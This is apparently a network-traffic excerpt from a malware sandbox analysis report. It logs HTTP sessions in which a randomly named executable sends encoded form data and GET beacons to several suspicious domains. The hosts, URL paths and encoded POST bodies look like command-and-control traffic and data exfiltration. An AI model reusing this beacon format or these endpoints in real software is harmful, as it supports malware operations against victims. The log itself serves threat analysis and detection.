                                                                                                                          Data Ascii: qFHlI=nW04OhvCZUUGLNHH1duf673bhfjWUOfUZEKKnbtqT7xQKkx2OTxLw8SNJEeyAzzhFkwkBs/KZ0kib+0lAvHg81dCzz76249jYvuHPMSrcJnPBqxejDaHKYE42aJRRb2tVnZMUNtRk16SRepB+DoR0ByNW8WQGfd893J9qwwJmtqn/4kUXw1nWYc4m5t4Wz4qAL7ZAjSQU8fdw+CIpL+D9RY+44WP3laPdWlu8HEwgHj6q7N3huJNvRjVGsFN+Qs/M1VsVFguE9hZD2R8FtoE8bsL35tsawETckSMI0ja21ytiHQL7RhTRA2xDCqqgH/Fhulbt7yka89p4fypBZOy0mEzQbl47wxcng71IPSfJhPvUDkrbDF9PlqKyq0NHt6Fc1bmVPBj+OnaYOThtansp3rcTDhB8xBKXgaCSSvaHZj3XP4B2YQoaoH+5ZIS/NK2hsvpw9ybdGYHTNwRungQiIbOsmnoI66O0ypD8FFxIn+MojkPaOcqD5QSuApxIrsaugGg3/Gc71bKhgPq2ga30t+Mfq2FrokF0Xy08Q6ayTFbw11q/mDuAPc7cpa2hr6rqLqt8PnDzuomiBFQ+WVN1f02IRiwP+fPXFctCRztBjsF+t/RpMoRKxZQbPIyKL0ORcisfpceDBUawl6sHoCZDoDIAPtwa1DgrirIP0LwterZJPZIXVACy93SypcIkpegKPXI4rUzz9+00YP0Bh15vnOeYIZJIqQE+kkf6v+XGWqPulsO0IOz3rWbZI0ABqMu6yfDqTSVx9BP1gSQhP3YfAB1eDHrng7EROsPpEbKhZI4iwqVQP/DPHXKOiyAymKh9fZ7vKQAqkChJoNLxmRZzaQF/A437lu1wQmTO7aZ2rBW7qponN5EpUxjXCdhXBSiEmw3jHdC+b/I+Dh4xR8tqwFRdYKXhXwsg1Z1Twwj0gKpxPXWWjSxvrzNgVaYkJWlJpXk0s2KU+/2hhExtdSfku0oon0RS+Wqvlaz1p/L8qrLtN [TRUNCATED]
                                                                                                                          Oct 21, 2024 17:25:47.065124035 CEST1236INHTTP/1.1 521
                                                                                                                          Date: Mon, 21 Oct 2024 15:25:47 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Content-Length: 6879
                                                                                                                          Connection: close
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=peTYctmP%2BydCjo6eTfb2%2FWVgQu8z9kXp69FP55tSRJQS5C0BWKRlGqbJmAZbwpHROvVqlMav%2BbrAKchW8g1dUNBQA4xTKfRFcZNj%2BPoxyuklUHDIEBiwIoImIsRQrPCWnHFwogb0fLmwlA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          Referrer-Policy: same-origin
                                                                                                                          Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8d624320188617a9-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1249&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1806&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21
                                                                                                                          Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<!
                                                                                                                          Oct 21, 2024 17:25:47.065136909 CEST1236INData Raw: 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 0a 0a 3c 74 69 74 6c 65 3e 77 77 77 2e 6c 61 75 6e 63 68 64 72 65 61 6d 69 64 65 61 2e 78 79 7a 20 7c 20 35 32 31 3a 20 57 65 62 20 73 65 72 76 65 72 20 69 73 20 64 6f 77 6e 3c 2f 74 69 74 6c
                                                                                                                          Data Ascii: [endif]--><head><title>www.launchdreamidea.xyz | 521: Web server is down</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta n
                                                                                                                          Oct 21, 2024 17:25:47.065200090 CEST1236INData Raw: 79 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 2d 32 34 30 20 6c 67 3a 77 2d 66 75 6c 6c 20 6d 78 2d 61 75 74 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22
                                                                                                                          Data Ascii: y"> <div class="w-240 lg:w-full mx-auto"> <div class="clearfix md:px-8"> <div id="cf-browser-status" class=" relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0
                                                                                                                          Oct 21, 2024 17:25:47.065234900 CEST1236INData Raw: 72 20 6e 6f 72 65 66 65 72 72 65 72 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 69 63 6f 6e 2d 63 6c 6f 75 64 20 62 6c 6f 63 6b 20 6d 64 3a 68 69 64 64 65 6e 20 68 2d 32 30 20 62 67 2d 63 65 6e 74 65 72 20 62 67 2d 6e 6f
                                                                                                                          Data Ascii: r noreferrer"> <span class="cf-icon-cloud block md:hidden h-20 bg-center bg-no-repeat"></span> <span class="cf-icon-ok w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span> </a> </div> <span clas
                                                                                                                          Oct 21, 2024 17:25:47.065289974 CEST848INData Raw: 20 6d 64 3a 6d 74 2d 30 20 74 65 78 74 2d 32 78 6c 20 74 65 78 74 2d 67 72 61 79 2d 36 30 30 20 66 6f 6e 74 2d 6c 69 67 68 74 20 6c 65 61 64 69 6e 67 2d 31 2e 33 22 3e 0a 20 20 20 20 0a 20 20 20 20 48 6f 73 74 0a 20 20 20 20 0a 20 20 3c 2f 68 33
                                                                                                                          Data Ascii: md:mt-0 text-2xl text-gray-600 font-light leading-1.3"> Host </h3> <span class="leading-1.3 text-2xl text-red-error">Error</span></div> </div> </div> </div> <div class="w-240 lg
                                                                                                                          Oct 21, 2024 17:25:47.065325975 CEST1236INData Raw: 73 65 6d 69 62 6f 6c 64 20 6d 62 2d 32 22 3e 49 66 20 79 6f 75 20 61 72 65 20 61 20 76 69 73 69 74 6f 72 20 6f 66 20 74 68 69 73 20 77 65 62 73 69 74 65 3a 3c 2f 68 33 3e 0a 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6d 62 2d 36 22 3e 50 6c
                                                                                                                          Data Ascii: semibold mb-2">If you are a visitor of this website:</h3> <p class="mb-6">Please try again in a few minutes.</p> <h3 class="text-15 font-semibold mb-2">If you are the owner of this website:</h3> <p><span>Contact your hosting
                                                                                                                          Oct 21, 2024 17:25:47.065365076 CEST783INData Raw: 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72
                                                                                                                          Data Ascii: </span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=www.launchdr


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          12192.168.2.650004188.114.96.3802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:25:49.077462912 CEST502OUTGET /bd77/?DJ=uNx48jdPyvmhqtM0&qFHlI=qUcYNRi6MmsiGKriyom62ti4lIWHctjIcWj4n4RDTJ9SK0tIDWNU+4/fdEnUeQPlIjs5HOj1IjY+OoVWBoHC3UpiwTnXxeZhDJSRDe+gKqbpDrlYtFKzXKQkj7Y9H+PYGWNXRqA= HTTP/1.1
                                                                                                                          Host: www.launchdreamidea.xyz
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Oct 21, 2024 17:25:49.589481115 CEST943INHTTP/1.1 521
                                                                                                                          Date: Mon, 21 Oct 2024 15:25:49 GMT
                                                                                                                          Content-Type: text/plain; charset=UTF-8
                                                                                                                          Content-Length: 15
                                                                                                                          Connection: close
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=08U2twkwazP7Lq%2FE6m4StYTpx2lmMelqAdakxOLB0jZeCYcHtGRKAk95%2BHgPWTpdeMIBxxmTj2E3r7hGtolj3SvstA34q5hH6ciTgEZ%2Bu39yVU03EigvKsP7SQXFxbyP2nsOgJccQn9fpw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          Referrer-Policy: same-origin
                                                                                                                          Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8d6243300ddc0f7d-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1192&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=502&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 31
                                                                                                                          Data Ascii: error code: 521


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          13192.168.2.6500053.33.130.190802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:25:54.643352985 CEST775OUTPOST /t10u/ HTTP/1.1
                                                                                                                          Host: www.mondayigboleague.info
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.mondayigboleague.info
                                                                                                                          Referer: http://www.mondayigboleague.info/t10u/
                                                                                                                          Content-Length: 210
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 2b 30 4d 75 48 50 43 4e 70 6d 30 61 46 2b 2f 74 68 52 53 49 33 4b 66 65 63 67 48 2b 37 76 41 52 73 74 58 6d 6a 62 39 59 43 56 41 6f 4c 32 32 55 42 57 53 37 76 4e 67 67 50 75 79 6b 34 55 64 79 4f 50 7a 6d 75 77 57 37 4c 54 2b 79 44 39 51 47 6a 67 6e 79 74 67 4a 5a 42 55 54 6e 4e 61 45 33 65 32 34 54 59 70 4c 58 41 65 79 6c 76 52 67 49 4c 4d 66 6c 68 4e 4a 42 6e 76 63 46 54 59 7a 2f 77 79 59 4e 78 59 70 76 4a 6b 4a 73 7a 41 58 52 62 48 7a 58 70 6b 6e 43 71 34 4b 76 2f 6c 6b 49 4e 4f 77 52 39 74 46 6f 5a 63 42 53 32 35 62 34 4b 2b 45 66 54 75 6b 4b 69 2b 59 75 66 50 79 50 6c 7a 61 44 6c 64 59 30 35 2f 52 67
                                                                                                                          Data Ascii: qFHlI=+0MuHPCNpm0aF+/thRSI3KfecgH+7vARstXmjb9YCVAoL22UBWS7vNggPuyk4UdyOPzmuwW7LT+yD9QGjgnytgJZBUTnNaE3e24TYpLXAeylvRgILMflhNJBnvcFTYz/wyYNxYpvJkJszAXRbHzXpknCq4Kv/lkINOwR9tFoZcBS25b4K+EfTukKi+YufPyPlzaDldY05/Rg


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          14192.168.2.6500083.33.130.190802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:25:57.201503038 CEST799OUTPOST /t10u/ HTTP/1.1
                                                                                                                          Host: www.mondayigboleague.info
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.mondayigboleague.info
                                                                                                                          Referer: http://www.mondayigboleague.info/t10u/
                                                                                                                          Content-Length: 234
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 2b 30 4d 75 48 50 43 4e 70 6d 30 61 45 66 50 74 6e 79 71 49 67 36 65 73 5a 67 48 2b 78 50 41 56 73 74 4c 6d 6a 5a 51 44 43 6a 77 6f 4c 58 47 55 47 53 47 37 73 4e 67 67 42 4f 79 74 32 30 64 37 4f 50 2f 75 75 78 71 37 4c 51 43 79 44 39 41 47 6a 53 50 78 73 77 4a 58 4e 30 54 6c 4a 61 45 33 65 32 34 54 59 70 66 39 41 65 71 6c 75 68 51 49 4b 70 72 6d 76 74 4a 43 77 66 63 46 58 59 7a 7a 77 79 59 6a 78 61 64 46 4a 6e 68 73 7a 42 6e 52 62 53 66 55 6e 6b 6e 41 6b 59 4c 46 36 6c 6c 65 58 6f 31 54 69 61 70 33 46 73 42 4c 36 76 61 69 57 4e 45 38 42 2b 45 49 69 38 41 63 66 76 79 6c 6e 7a 69 44 33 4b 55 54 32 4c 30 44 69 48 49 67 72 65 43 78 71 6e 75 69 58 73 6d 75 54 76 64 6b 72 77 3d 3d
                                                                                                                          Data Ascii: qFHlI=+0MuHPCNpm0aEfPtnyqIg6esZgH+xPAVstLmjZQDCjwoLXGUGSG7sNggBOyt20d7OP/uuxq7LQCyD9AGjSPxswJXN0TlJaE3e24TYpf9AeqluhQIKprmvtJCwfcFXYzzwyYjxadFJnhszBnRbSfUnknAkYLF6lleXo1Tiap3FsBL6vaiWNE8B+EIi8AcfvylnziD3KUT2L0DiHIgreCxqnuiXsmuTvdkrw==


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          15192.168.2.6500093.33.130.190802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:25:59.910567999 CEST1812OUTPOST /t10u/ HTTP/1.1
                                                                                                                          Host: www.mondayigboleague.info
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.mondayigboleague.info
                                                                                                                          Referer: http://www.mondayigboleague.info/t10u/
                                                                                                                          Content-Length: 1246
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 2b 30 4d 75 48 50 43 4e 70 6d 30 61 45 66 50 74 6e 79 71 49 67 36 65 73 5a 67 48 2b 78 50 41 56 73 74 4c 6d 6a 5a 51 44 43 67 51 6f 4c 6c 4f 55 47 77 75 37 74 4e 67 67 4a 75 79 6f 32 30 63 37 4f 50 6e 71 75 78 6e 4d 4c 56 47 79 46 66 34 47 72 44 50 78 6e 77 4a 58 46 55 54 67 4e 61 46 31 65 79 56 62 59 70 50 39 41 65 71 6c 75 69 49 49 63 4d 66 6d 74 74 4a 42 6e 76 63 4a 54 59 7a 66 77 79 67 56 78 5a 78 2f 49 57 42 73 39 42 33 52 5a 6b 72 55 76 6b 6e 47 70 34 4c 64 36 6c 6f 41 58 6f 42 70 69 66 56 4e 46 72 42 4c 2f 5a 53 2f 45 63 77 55 64 4e 73 43 37 38 41 73 58 4c 71 37 76 7a 61 6a 36 62 63 55 32 6f 52 76 6e 67 77 62 39 64 48 6c 2f 30 69 4e 4c 38 58 71 47 2b 6b 6f 34 44 77 32 4c 5a 43 72 73 6d 4c 55 64 59 43 4c 48 34 4b 44 77 44 33 47 7a 73 46 4b 67 72 53 46 4b 56 78 2f 4a 66 4e 64 4c 2f 45 78 64 74 72 41 79 37 31 69 49 4a 32 44 5a 43 79 30 46 59 48 47 4e 64 63 6a 70 5a 67 7a 44 42 4f 72 37 59 68 76 49 61 30 43 72 72 37 49 4e 4a 73 59 42 6d 56 73 4b 34 78 72 38 6d 33 48 73 35 71 50 [TRUNCATED]
                                                                                                                          Data Ascii: qFHlI=+0MuHPCNpm0aEfPtnyqIg6esZgH+xPAVstLmjZQDCgQoLlOUGwu7tNggJuyo20c7OPnquxnMLVGyFf4GrDPxnwJXFUTgNaF1eyVbYpP9AeqluiIIcMfmttJBnvcJTYzfwygVxZx/IWBs9B3RZkrUvknGp4Ld6loAXoBpifVNFrBL/ZS/EcwUdNsC78AsXLq7vzaj6bcU2oRvngwb9dHl/0iNL8XqG+ko4Dw2LZCrsmLUdYCLH4KDwD3GzsFKgrSFKVx/JfNdL/ExdtrAy71iIJ2DZCy0FYHGNdcjpZgzDBOr7YhvIa0Crr7INJsYBmVsK4xr8m3Hs5qPKBQFV/Hx8i0ZcKx7qPi2Z2JwDE2+bZQ0DyvxXhHvMPyf5xwYgN4BDBYUq4L8LXuoJ3RcL8YtvA9nx83WWh8ZXkMduWEfkzCbxMzddWUg6DbhNfse+QHVyLwjCxiaJA91L52+gGeKEF7Vqw8qaWO+gdWdzlVdt7nBJE49UrMcxrUy5fFr6BbkV0eCqvWk1xk1lFtwVipiVv4bGip8qUoErfp5k5prhV0T1EJRMFo6xsp04kBDXsCKzBLTMvMVEcf6/159cgKbs3ttwqelBrGJ79rTiLONF6084mBTdbscJslpx4UuX546MNw8pyaXFMkRiL4ntHSvTrII0iEbTnAjaKERmpEJdhRWto6q5D+IkWg82VosbaA1OvpD6jLUy9ZkwSn5CBSA2dj1GOJZ6YGFvFMFUYQaa/R092FkMzJZO837neKgwfU9cbmO/I5DSwT8FAbhEtt55A4A6E1EIgL7lkrpAvonrq/ARkZp28qBqHawvR1pHWXSJhP2qNBf6XuSioDpznoVb5daQZvyfsz8CRuo5KAhwuYK+ALciTIi+/qJTWS5dJwL2y1uNhwcozHEkUM/ftwtI0P2WdiIwFWWGniXt/+2xa4Iwb4AyjZx/8f4jIFXxQSVIiEOKKMR09+CSYzr+Tq6Vjfzc3bap7tQx3dtSNYi97RYUb [TRUNCATED]


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          16192.168.2.6500103.33.130.190802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:26:02.454828024 CEST504OUTGET /t10u/?qFHlI=z2kOE6Hdw1U1MLXnqmWT9va9e3/8+PVtvvr0x5hWEi4SF2SHBGm8gNhzQPXfz38/DYz+lgbjU03/S4gao0rDvDpYIFnALopyeCE4e57jCdKl+SQ4LvrwwLBMyOkaQtLwrEg4wvg=&DJ=uNx48jdPyvmhqtM0 HTTP/1.1
                                                                                                                          Host: www.mondayigboleague.info
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Oct 21, 2024 17:26:04.854501963 CEST417INHTTP/1.1 200 OK
                                                                                                                          Server: openresty
                                                                                                                          Date: Mon, 21 Oct 2024 15:26:04 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 277
                                                                                                                          Connection: close
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 71 46 48 6c 49 3d 7a 32 6b 4f 45 36 48 64 77 31 55 31 4d 4c 58 6e 71 6d 57 54 39 76 61 39 65 33 2f 38 2b 50 56 74 76 76 72 30 78 35 68 57 45 69 34 53 46 32 53 48 42 47 6d 38 67 4e 68 7a 51 50 58 66 7a 33 38 2f 44 59 7a 2b 6c 67 62 6a 55 30 33 2f 53 34 67 61 6f 30 72 44 76 44 70 59 49 46 6e 41 4c 6f 70 79 65 43 45 34 65 35 37 6a 43 64 4b 6c 2b 53 51 34 4c 76 72 77 77 4c 42 4d 79 4f 6b 61 51 74 4c 77 72 45 67 34 77 76 67 3d 26 44 4a 3d 75 4e 78 34 38 6a 64 50 79 76 6d 68 71 74 4d 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?qFHlI=z2kOE6Hdw1U1MLXnqmWT9va9e3/8+PVtvvr0x5hWEi4SF2SHBGm8gNhzQPXfz38/DYz+lgbjU03/S4gao0rDvDpYIFnALopyeCE4e57jCdKl+SQ4LvrwwLBMyOkaQtLwrEg4wvg=&DJ=uNx48jdPyvmhqtM0"}</script></head></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          17192.168.2.657327217.70.184.50802656C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Oct 21, 2024 17:26:10.623488903 CEST745OUTPOST /0bvj/ HTTP/1.1
                                                                                                                          Host: www.stocksm.fun
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Origin: http://www.stocksm.fun
                                                                                                                          Referer: http://www.stocksm.fun/0bvj/
                                                                                                                          Content-Length: 210
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                          Data Raw: 71 46 48 6c 49 3d 45 71 39 57 37 57 73 4e 62 69 68 70 32 43 35 52 37 41 76 5a 32 31 51 42 52 5a 44 71 57 4e 59 4e 38 62 39 62 75 2b 44 4d 4a 36 30 2f 64 44 4e 71 50 75 4b 59 7a 4c 77 2b 73 4e 39 59 4c 42 73 4f 37 2f 64 57 31 69 74 36 36 69 48 65 61 53 44 73 4a 61 2f 67 67 2b 32 51 2f 65 55 6a 56 76 51 71 31 6f 43 54 31 39 49 6a 44 39 70 66 41 34 73 48 43 5a 46 32 67 2b 75 77 73 48 31 73 38 54 78 4a 59 38 6a 39 35 56 72 33 34 4a 57 79 47 43 69 49 6e 6f 68 31 2b 6d 72 54 31 30 45 63 63 6f 35 6f 4d 68 36 55 4e 47 52 6b 38 53 67 36 76 53 7a 52 68 70 6a 4c 65 2f 65 64 2f 38 73 67 72 70 69 48 6b 36 51 52 4f 49 78 5a 75 59 53 56
                                                                                                                          Data Ascii: qFHlI=Eq9W7WsNbihp2C5R7AvZ21QBRZDqWNYN8b9bu+DMJ60/dDNqPuKYzLw+sN9YLBsO7/dW1it66iHeaSDsJa/gg+2Q/eUjVvQq1oCT19IjD9pfA4sHCZF2g+uwsH1s8TxJY8j95Vr34JWyGCiInoh1+mrT10Ecco5oMh6UNGRk8Sg6vSzRhpjLe/ed/8sgrpiHk6QROIxZuYSV
                                                                                                                          Oct 21, 2024 17:26:11.174297094 CEST608INHTTP/1.1 501 Unsupported method ('POST')
                                                                                                                          Server: nginx
                                                                                                                          Date: Mon, 21 Oct 2024 15:26:11 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
